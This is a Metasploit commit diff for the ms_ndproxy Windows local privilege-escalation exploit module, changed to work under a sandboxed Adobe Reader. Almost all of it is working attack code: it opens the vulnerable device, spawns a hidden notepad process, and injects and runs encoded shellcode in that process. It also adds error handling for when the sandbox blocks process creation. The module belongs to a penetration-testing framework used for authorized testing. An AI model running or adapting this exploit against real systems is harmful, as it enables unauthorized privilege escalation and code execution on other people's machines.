Land rapid7#2773 - Fix ms_ndproxy to work under a sandboxed Reader

wchen-r7 · wchen-r7 · commit ad2ec497c253 · 2013-12-16T20:32:27.000-06:00
diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -28,7 +28,7 @@ module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In o
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
-          'Unkwnon', # Vulnerability discovery
+          'Unknown', # Vulnerability discovery
           'ryujin', # python PoC
           'Shahin Ramezany', # C PoC
           'juan vazquez' # MSF module
@@ -150,7 +150,7 @@ def open_device(dev)
 
     invalid_handle_value = 0xFFFFFFFF
 
-    r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", 0, 0)
+    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
 
     handle = r['return']
 
@@ -234,7 +234,14 @@ def create_proc
     windir = expand_path("%windir%")
     cmd = "#{windir}\\System32\\notepad.exe"
     # run hidden
-    proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    begin
+      proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    rescue Rex::Post::Meterpreter::RequestError
+      # when running from the Adobe Reader sandbox:
+      # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
+      return nil
+    end
+
     return proc.pid
   end
 
@@ -424,9 +431,14 @@ def exploit
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
     end
 
+    p = payload.encoded
     print_good("Exploitation successful! Creating a new process and launching payload...")
     new_pid = create_proc
-    p = payload.encoded
+
+    if new_pid.nil?
+      print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
+      return
+    end
 
     print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
     if execute_shellcode(p, nil, new_pid)
@@ -435,6 +447,7 @@ def exploit
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
 
+
   end
 
 end
